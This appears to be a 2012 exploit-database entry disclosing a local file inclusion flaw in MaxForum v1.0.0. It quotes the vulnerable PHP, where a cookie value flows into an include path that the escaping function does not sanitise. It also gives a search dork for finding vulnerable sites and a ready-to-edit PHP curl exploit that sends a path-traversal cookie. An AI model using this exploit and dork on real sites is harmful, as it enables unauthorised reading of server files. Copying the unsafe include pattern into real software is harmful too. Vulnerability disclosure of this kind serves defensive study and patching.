MaxForum v1.0.0 Local File Inclusion Vulnerability



EKU-ID: 2577 CVE: OSVDB-ID:
Author: ahwak2000 Published: 2012-08-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


    +---------------------------------------+
    | MaxForum v1.0.0 Local File Inclusion  |
    +---------------------------------------+
    Author.............: ahwak2000
    Mail...............: z.u5[at]hotmail[dot]com
    Software link......: http://www.max4dev.com/
    Tested versions....: 1.0
    Dork...............: Powered by MaxForum v1.0.0
    Date...............: 15/08/2012
    ---------------------------------------------------------------
    in file /MaxForum/includes/forums/warn_popup.php
    
    line 100                        if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){
    line 101                        $board_lang = escape_string($_COOKIE['max_lang']);
    line 102                }
    line 103
    line 104        @include "../../language/$board_lang";
    line 105        @include "../../language/$board_lang.php";
    
    
    -------------
    in file /MaxForum/libs/php/functions.php
    
                    function escape_string($string) {
    
                            $string = addslashes($string);
                          
                            $string = htmlspecialchars($string);
                            return $string;
                    }
    ----------------------------------------------------------------
    exploit:
    
    <?
    $url="http://site.com/MaxForum/";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url."/includes/forums/warn_popup.php");
    curl_setopt($ch, CURLOPT_COOKIE, "max_lang=../gpl.txt");  // <--- edit
     $buffer = curl_exec($ch);
    ?>
    
    #end